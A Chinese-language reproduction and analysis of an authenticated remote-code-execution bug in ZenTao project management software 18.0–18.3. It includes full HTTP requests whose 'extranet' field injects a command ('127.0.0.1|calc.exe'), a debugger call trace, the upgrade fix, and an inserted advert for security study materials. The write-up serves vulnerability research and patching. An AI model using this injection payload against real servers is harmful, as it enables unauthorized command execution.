漏洞简介
禅道是第一款国产的开源项目管理软件。它集产品管理、项目管理、质量管理、文档管理、 组织管理和事务管理于一体,是一款专业的研发项目管理软件,完整地覆盖了项目管理的核心流程。 禅道管理思想注重实效,功能完备丰富,操作简洁高效,界面美观大方,搜索功能强大,统计报表丰富多样,软件架构合理,扩展灵活,有完善的 API 可以调用。
禅道后台存在 RCE 漏洞,存在于 V18.0-18.3 之间,经过复现分析,发现漏洞来源于新增加的一个功能模块。
环境搭建
源码下载地址 https://www.zentao.net/dl/zentao/18.2/ZenTaoPMS.18.2.php7.2_7.4.zip
利用 phpstudy 来进行环境的搭建
漏洞复现
登录后台后访问添加宿主机
[img=720,377.219]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202308281324501.png[/img]
[img=720,377.8487394957983]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202308281324502.png[/img]
在 ip 域名处 拼接恶意 payload 触发漏洞
【----帮助网安学习,以下所有学习资料免费领!加vx:yj009991,备注 “博客园” 获取!】
① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC漏洞分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)- POST /index.php?m=zahost&f=create HTTP/1.1
- Host: test.test
- Content-Length: 131
- Accept: application/json, text/javascript, */*; q=0.01
- X-Requested-With: XMLHttpRequest
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- Origin: http://test.test
- Referer: http://test.test/index.php?m=zahost&f=create
- Accept-Encoding: gzip, deflate
- Accept-Language: zh-CN,zh;q=0.9
- Cookie: zentaosid=bp9k0pcftu49b2ethm9f32hc5b; lang=zh-cn; device=desktop; theme=default; preExecutionID=1; moduleBrowseParam=0; productBrowseParam=0; executionTaskOrder=status%2Cid_desc; repoBranch=master; lastProduct=1; tab=qa; windowWidth=1440; windowHeight=722
- Connection: close
-
- vsoft=kvm&hostType=physical&name=test2&extranet=127.0.0.1%7Ccalc.exe&cpuCores=2&memory=1&diskSize=1&desc=&uid=64e46f386d9ea&type=za
漏洞分析
这是禅道新增加的一个功能
[img=720,371.1371237458194]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202308281324504.png[/img]
[img=720,376.19167717528376]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202308281324505.png[/img]
增加新功能的同时也带来了新的风险点
module/zahost/control.php#create
[img=720,285.97701149425285]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202308281324507.png[/img]
module/zahost/model.php#create
[img=720,290.5912596401028]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202308281324508.png[/img]
module/zahost/model.php#checkAddress
[img=720,260.41898247114153]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202308281324509.png[/img]
module/zahost/model.php#ping
[img=720,269.7713801862828]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202308281324510.png[/img]
整个漏洞触发流程在断点调试的过程中一目了然- POST /index.php?m=zahost&f=edit&hostID=1 HTTP/1.1
- Host: test.test
- Content-Length: 131
- Accept: application/json, text/javascript, */*; q=0.01
- X-Requested-With: XMLHttpRequest
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- Origin: http://test.test
- Referer: http://test.test/index.php?m=zahost&f=create
- Accept-Encoding: gzip, deflate
- Accept-Language: zh-CN,zh;q=0.9
- Cookie: zentaosid=bp9k0pcftu49b2ethm9f32hc5b; lang=zh-cn; device=desktop; theme=default; preExecutionID=1; moduleBrowseParam=0; productBrowseParam=0; executionTaskOrder=status%2Cid_desc; repoBranch=master; lastProduct=1; tab=qa; windowWidth=1440; windowHeight=722;XDEBUG_SESSION=PHPSTORM
- Connection: close
-
- vsoft=kvm&hostType=physical&name=test4&extranet=127.0.0.1%7Ccalc.exe&cpuCores=2&memory=1&diskSize=1&desc=&uid=64e46f386d9ea&type=za
- model.php:119, zahostModel-\>ping()
- model.php:149, zahostModel-\>checkAddress()
- model.php:94, zahostModel-\>update()
- control.php:130, zahost-\>edit()
- router.class.php:2199, router-\>loadModule()
- index.php:74, {main}()
更新至最新版本
[img=720,241.84615384615384]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202308281324511.png[/img]
执行命令时对地址进行了校验
更多网安技能的在线实操练习,请点击这里>>
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作! |
